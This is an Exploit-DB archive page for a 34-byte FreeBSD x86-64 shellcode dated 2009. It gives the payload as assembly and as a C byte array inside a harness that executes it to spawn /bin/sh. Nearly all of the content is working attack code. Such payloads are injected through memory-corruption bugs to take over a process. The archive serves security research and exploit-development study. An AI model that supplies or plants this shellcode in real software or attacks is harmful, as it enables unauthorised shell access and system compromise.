FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)

EDB-ID:

13280

CVE:

N/A

EDB Verified:

Author:

c0d3_z3r0

Type:

shellcode

Exploit:   /  

Platform:

FreeBSD_x86-64

Date:

2009-05-15

Vulnerable App: 
/*
Anderson Eduardo < c0d3_z3r0 >
Hack'n Roll
http://anderson.hacknroll.com
http://blog.hacknroll.com 
 
.section .text
.globl _start
_start:
 

        xor %rcx,%rcx
        jmp string
 
        main:
 
        popq %rsi
        movq %rsi,%rdi
 
        pushq %rsi
        pushq %rcx
        movq %rsp,%rsi
 
        movq %rcx,%rdx
        movb $0x3b,%al
        syscall
 
        string:
        callq main
        .string "/bin/sh"
 

*/
 
int main(void)
{
char shellcode[] =
"\x48\x31\xc9"
"\xeb\x10"
"\x5e"
"\x48\x89\xf7"
"\x56"
"\x51"
"\x48\x89\xe6"
"\x48\x89\xca"
"\xb0\x3b"
"\x0f\x05"
"\x48\xe8\xea\xff\xff\xff"
"\x2f"
"\x62"
"\x69"
"\x6e"
"\x2f"
"\x73\x68";
 
        (*(void (*)()) shellcode)();
 
//Hack'n Roll
 
return 0;
} 

// milw0rm.com [2009-05-15]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services